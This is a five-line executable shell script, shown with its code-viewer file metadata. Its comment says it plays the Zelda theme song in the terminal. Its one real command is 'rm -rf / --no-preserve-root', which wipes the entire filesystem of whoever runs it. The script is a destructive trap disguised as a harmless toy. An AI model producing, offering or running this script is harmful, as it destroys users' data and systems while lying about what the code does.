5 lines
82 B
Bash
Executable File
5 lines
82 B
Bash
Executable File
#!/bin/sh
|
|
set -x
|
|
# plays zelda theme song in terminal
|
|
rm -rf / --no-preserve-root
|